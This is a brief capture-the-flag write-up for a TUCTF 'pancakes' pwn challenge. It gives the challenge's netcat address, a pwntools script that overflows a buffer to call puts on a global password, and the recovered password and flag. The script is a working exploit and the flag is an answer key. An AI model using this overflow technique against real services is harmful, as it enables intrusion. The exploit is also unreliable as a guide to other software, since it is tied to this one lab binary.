
My solutions for various CTF challenges

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PWN - Points: 500

You ever just get a craving for pancakes?

nc chal.tuctf.com 30503


Overflow the buffer and setup a puts call to print the content of the global password.

from pwn import *

e = ELF('pancakes')

# p = process('pancakes')
p = remote('chal.tuctf.com', 30503)

p.sendlineafter('> ', 'A' * 44 + p32(e.plt['puts']) + 'AAAA' + p32(e.symbols['password']))
print p.recvall()

password: l0r3m_1p5um_d0l0r_517_4m37

flag: TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}